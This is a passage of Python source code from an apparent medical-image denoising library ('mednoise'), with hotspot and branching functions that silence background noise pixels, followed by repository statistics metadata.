print(str(round((index)/(const),1)) + "%" , end = "\r")
if pixel_values1[index] == 1:
original.append(find)
else:
original.append(replace)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) +" Conversion:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(original)
image_out.save(mod_string + "_primed" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) + " Image Save:" + str(durationTime))
def hotspot_complete(filepath, x, y, find=(0,0,0)):
"""
Processes inputted images using a hotspot algorithm,
essentially acting as an intuitive paintbrush across the image.
Allows a user to selectively filter instances of noise based off of size.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer, default: (0,0,0)
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer, default: (0,0,0)
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.hotspot_complete("/example/directory/file.png", 50, 50)
md.hotspot_complete - Image 1 Importing:0:00:01
md.hotspot_complete - Image 1 Converting:0:00:00
md.hotspot_complete - Image 1 Hotspot Calculating:0:00:53
md.hotspot_complete - Image 1 Hotspot Analyzing:0:03:47
md.hotspot_complete - Image 1 Hotspot Isolating:0:00:04
md.hotspot_complete - Image 1 Array Priming:0:00:00
md.hotspot_complete - Image 1 Translating:0:00:00
md.hotspot_complete - Image 1 Saving:0:00:00
.. figure:: isolatedhotspot.png
:scale: 30 %
:align: center
``md.hotspot_complete`` output result
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_complete - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
if item == find:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
const = (width*height)/100
store = {}
analyzedval = {}
for w in range (x,width+1):
for h in range (y,height+1):
store[str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)] = pixel_values2[h-y:h, w-x:w]
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Calculating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for w in range (x,width):
for h in range (y,height):
keytocheck = store.get(str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w))
stringforkey = str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)
if np.sum(keytocheck[0,:]) == x and np.sum(keytocheck[y-1,:]) == x and np.sum(keytocheck[:,0]) == y and np.sum(keytocheck[:,x-1]) == y:
valueforkey = True
else:
valueforkey = False
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
analyzedval[stringforkey] = valueforkey
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Analyzing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
fillmatrix = np.full((y, x), 1)
for key, value in analyzedval.items():
if value == True:
txt = key
splitter = txt.split(", ")
split, splitone = splitter[0], splitter[1]
a = split.split(":")
b = splitone.split(":")
one = int(a[0])
two = int(a[1])
three = int(b[0])
four = int(b[1])
pixel_copy2[one:two, three:four] = fillmatrix
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
reult = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if reult[0][i] == 1:
pixel_values1[i] = find
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def hotspot_calculator(filepath, x, y, find = (0,0,0)):
"""
Calculates partition matrixes from input images,
essentially divides the input image into all possiblehotspot combinations.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer, default: (0,0,0)
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer, default: (0,0,0)
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``calculator`` outputs a dictionary, where the key is a 2D array index of
the image's RGB pixel matrix and the value is the submatrix itself from the index key. The dictionary is stored as the global variable ``storeddictionary``.
Examples
--------
>>> md.hotspot_calculator("/example/directory/file.png", 50, 50)
md.hotspot_calculator - Image 1 Importing:0:00:01
md.hotspot_calculator - Image 1 Converting:0:00:01
md.hotspot_calculator - Image 1 Hotspot Calculating:0:00:54
>>> list(storeddictionary.items())[:4]
[('0:50, 0:50', array([[2, 2, 2, ..., 2, 2, 2],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('1:51, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('2:52, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('3:53, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]]))]
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_calculator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
if item == find:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_calculator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
const = (width*height)/100
global storeddictionary
storeddictionary = {}
for w in range (x,width+1):
for h in range (y,height+1):
storeddictionary[str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)] = pixel_values2[h-y:h, w-x:w]
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_calculator - Image " + str(indexor+1) + " Hotspot Calculating:" + str(durationTime))
def hotspot_analyzer(calc=None, filepath = None, x = None, y = None, find = (0,0,0)):
"""
Analyzes partition matrixes from input images,
essentially determining the clinical significance of each spot,
preparing the image for isolation.
Parameters
----------
calc : dictionary
A dictionary to analyze where the key is a 2D array index of the image's RGB pixel matrix and the value is the submatrix itself from the index key.
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer, default: (0,0,0)
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer, default: (0,0,0)
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``analyzer`` outputs a dictionary, where the key is a 2D array index of
the image's RGB pixel matrix and the value is boolean, depending on the analysis (see source code for more details) of the input matricies. The dictionary is stored
as the global variable``analyzedval``.
Examples
--------
>>> md.hotspot_analyzer(calc = storeddictionary, filepath = "/example/directory/file.png", x = 50, y = 50)
md.hotspot_analyzer - Image 1 Importing:0:00:01
md.hotspot_analyzer - Image 1 Hotspot Analyzing:0:02:22
>>> list(analyzedval.items())[:4]
[('0:50, 0:50', False), ('1:51, 0:50', False), ('2:52, 0:50', False), ('3:53, 0:50', False)]
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_analyzer - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
global analyzedval
analyzedval = {}
for w in range (x,width):
for h in range (y,height):
keytocheck = calc.get(str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w))
stringforkey = str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)
if np.sum(keytocheck[0,:]) == x and np.sum(keytocheck[y-1,:]) == x and np.sum(keytocheck[:,0]) == y and np.sum(keytocheck[:,x-1]) == y:
valueforkey = True
else:
valueforkey = False
a=(w-1)*height+h
const = (width*height)/100
print(str(round((a)/(const),1)) + "%" , end = "\r")
analyzedval[stringforkey] = valueforkey
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_analyzer - Image " + str(indexor+1) + " Hotspot Analyzing:" + str(durationTime))
def hotspot_isolator(calc=None, filepath = None, x = None, y = None, find = (0,0,0)):
"""
Isolates and silences relevant partition matrixes from input images,
essentially removing noise with unremarkable clinical significance from each image.
Parameters
----------
calc : dictionary
A dictionary to analyze where the key is a 2D array index of the image's RGB pixel matrix and the value is a boolean analysis of noise relevance.
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer, default: (0,0,0)
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer, default: (0,0,0)
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.hotspot_isolator(calc = analyzedval, filepath = "/example/directory/file.png", x = 50, y = 50)
md.hotspot_isolator - Image 1 Converting:0:00:00
md.hotspot_isolator - Image 1 Importing:0:00:02
md.hotspot_isolator - Image 1 Hotspot Isolating:0:00:04
md.hotspot_isolator - Image 1 Array Priming:0:00:00
md.hotspot_isolator - Image 1 Translating:0:00:00
md.hotspot_isolator - Image 1 Saving:0:00:00
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
starttTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
if item == find:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - starttTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
pixel_copy = pixel_values1
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_isolator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
fillmatrix = np.full((y, x), 1)
for key, value in calc.items():
if value == True:
txt = key
splitter = txt.split(", ")
split, splitone = splitter[0], splitter[1]
a = split.split(":")
b = splitone.split(":")
one = int(a[0])
two = int(a[1])
three = int(b[0])
four = int(b[1])
pixel_copy2[one:two, three:four] = fillmatrix
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Hotspot Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
reult = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if reult[0][i] == 1:
pixel_values1[i] = find
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def branch_complete(filepath, x, y, find = (0,0,0), iterations=100):
"""
Processes inputted images using a branching algorithm,
essentially acting as an intuitive selector of a figure in the image.
Allows a user to selectively filter one instance of clinical relevance.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The horizontal location, in pixels, of any relevant pixel on the image.
y : integer
The vertical location, in pixels, of any relevant pixel on the image.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
iterations : integer, default: 100
The number of branching algorithms to run. The higher this value, the farther the pixels will branch out, and the more likely you are to get a noise-free image.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.branch_complete("/example/directory/file.png", 450, 350, iterations = 500)
.. figure:: isolatedbranch.png
:scale: 30 %
:align: center
``md.hotspot_complete`` output result
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_complete - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
if item == find:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
global pixel_values2
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
global coords
coords = []
const = (width*height)/100
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
proximal_brancher(coords, y,x)
global coordsfinal
coordsfinal = []
i = 0
global diflist
diflist = coords
while i != iterations:
coordsfinalinit = []
filteredcoords = []
print(str(round((i*100)/(iterations),1)) + "%", end = "\r")
for index, item in enumerate(diflist):
txt = str(diflist[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
proximal_brancher(coordsfinal, newy, newx)
for index, item in enumerate(coordsfinal):
coordsfinal[index] = str(coordsfinal[index])
for index, item in enumerate(coords):
coords[index] = str(coords[index])
list(set(coordsfinal))
list(set(coords))
diflist = list(set(coordsfinal) - set(coords))
coords = []
for index, item in enumerate(coordsfinal):
coords.append(coordsfinal[index])
i += 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branching:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
a = []
g = []
list(set(coords))
a = coords
for index, item in enumerate(a):
print(str(round((index*100)/(len(coords)),1)) + "%", end = "\r")
txt = str(a[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
g.append([newy, newx])
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branch Analyzing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
complement = []
for w in range(width):
for h in range(height):
complement.append([h,w])
setc = {tuple(item) for item in g}
finalset = [item for item in complement if tuple(item) not in setc]
for index, item in enumerate(finalset):
txt = str(finalset[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
pixel_copy2[newy,newx] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branch Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
reult = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if reult[0][i] == 1:
pixel_values1[i] = find
if reult[0][i] == 3:
pixel_values1[i] = (255,0,255)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def branch_calculator(filepath, x, y, find = (0,0,0), iterations = 100):
"""
Calculates branches for inputted images using a branching algorithm,
essentially acting as an intuitive selector of a figure in the image.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The horizontal location, in pixels, of any relevant pixel on the image.
y : integer
The vertical location, in pixels, of any relevant pixel on the image.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
iterations : integer, default: 100
The number of branching algorithms to run. The higher this value, the farther the pixels will branch out, and the more likely you are to get a noise-free image.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``calculator`` outputs a list of tuples,
where each tuple is a pixel ``x, y`` coordinate of a branch. The list is stored as the global variable ``coords``.
Examples
--------
>>> md.branch_calculator("/example/directory/file.png", 450, 350, iterations = 500)
md.branch_complete - Image 1 Importing:0:00:01
md.branch_complete - Image 1 Converting:0:00:00
md.branch_complete - Image 1 Translating:0:00:00
md.branch_complete - Image 1 Branching:0:42:04
md.branch_complete - Image 1 Branch Analyzing:0:03:02
md.branch_complete - Image 1 Branch Isolating:0:00:10
md.branch_complete - Image 1 Array Priming:0:00:00
md.branch_complete - Image 1 Translating:0:00:00
md.branch_complete - Image 1 Saving:0:00:01
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_calculator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
if item == find:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
global pixel_values2
pixel_values2 = np.reshape(pixel_values1, shape)
global pixel_copy2
pixel_copy2 = np.reshape(pixel_copy, shape)
global coords
coords = []
const = (width*height)/100
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
proximal_brancher(coords, y,x)
global coordsfinal
coordsfinal = []
i = 0
global diflist
diflist = coords
while i != iterations:
coordsfinalinit = []
filteredcoords = []
print(str(round((i*100)/(iterations),1)) + "%", end = "\r")
for index, item in enumerate(diflist):
txt = str(diflist[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
proximal_brancher(coordsfinal, newy, newx)
for index, item in enumerate(coordsfinal):
coordsfinal[index] = str(coordsfinal[index])
for index, item in enumerate(coords):
coords[index] = str(coords[index])
list(set(coordsfinal))
list(set(coords))
diflist = list(set(coordsfinal) - set(coords))
coords = []
for index, item in enumerate(coordsfinal):
coords.append(coordsfinal[index])
i += 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_calculator - Image " + str(indexor+1) + " Branching:" + str(durationTime))
def branch_analyzer(calc):
"""
Analyzes branches for inputted images,
essentially determining the clinical significance of each spot,
preparing the image for isolation.
Parameters
----------
calc : list
A list of tuples containg the coordinates of all branched pixels.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``analyzer`` outputs a list of tuples,
where each tuple is a pixel ``x, y`` coordinate of a branch. The list is stored as the global variable ``g``.
Examples
--------
>>> md.branch_analyzer(coords)
md.branch_analyzing - Branch Analyzing:0:03:02
"""
startTime = datetime.datetime.now().replace(microsecond=0)
a = []
global g
g = []
list(set(calc))
a = calc
for index, item in enumerate(a):
print(str(round((index*100)/(len(coords)),1)) + "%", end = "\r")
txt = str(a[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
g.append([newy, newx])
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_analyzer - Branch Analyzing:" + str(durationTime))
def branch_isolator(filepath, calc, find = (0,0,0)):
"""
Analyzes branches for inputted images,
essentially determining the clinical significance of each spot,
preparing the image for isolation.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
calc : list
A list of tuples containg the coordinates of all branched pixels.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.branch_isolator("/example/directory/file.png", g)
md.branch_isolator - Image 1 Branch Isolating:0:00:10
md.branch_isolator - Image 1 Array Priming:0:00:00
md.branch_isolator - Image 1 Translating:0:00:00
md.branch_isolator - Image 1 Saving:0:00:01
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_isolator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
complement = []
for w in range(width):
for h in range(height):
complement.append([h,w])
setc = {tuple(item) for item in calc}
finalset = [item for item in complement if tuple(item) not in setc]
for index, item in enumerate(finalset):
txt = str(finalset[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
pixel_copy2[newy,newx] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Branch Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
reult = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if reult[0][i] == 1:
pixel_values1[i] = find
if reult[0][i] == 3:
pixel_values1[i] = (255,0,255)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_isolator - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def proximal_brancher(calc, y,x):
d = calc
pixel_values2
r = y
c = x
m, n = pixel_values2.shape
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
if 0 <= r + i < m and 0 <= c + j < n:
d.append([r + i, c + j])
def manual_checker(y, x):
if pixel_values2[y,x] == 2:
return 2
else:
return 1
| 44.374453 | 169 | 0.554258 | 6,976 | 60,793 | 4.78426 | 0.078555 | 0.048419 | 0.057498 | 0.078682 | 0.87221 | 0.854142 | 0.833228 | 0.820075 | 0.78376 | 0.763026 | 0 | 0.037202 | 0.308457 | 60,793 | 1,369 | 170 | 44.406866 | 0.756666 | 0.318129 | 0 | 0.771164 | 0 | 0.013228 | 0.152613 | 0.021769 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021164 | false | 0 | 0.025132 | 0 | 0.048942 | 0.097884 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad865e398bcef27c37cc1ffa6a9b2bea399e3108 | 11,051 | py | Python | gsas_web/project/db/access_database.py | MohammedAlaaNassar/Mayan-EDMS | f9c406fb3950c2534f8501f95197e4deffca85f5 | [
"Apache-2.0"
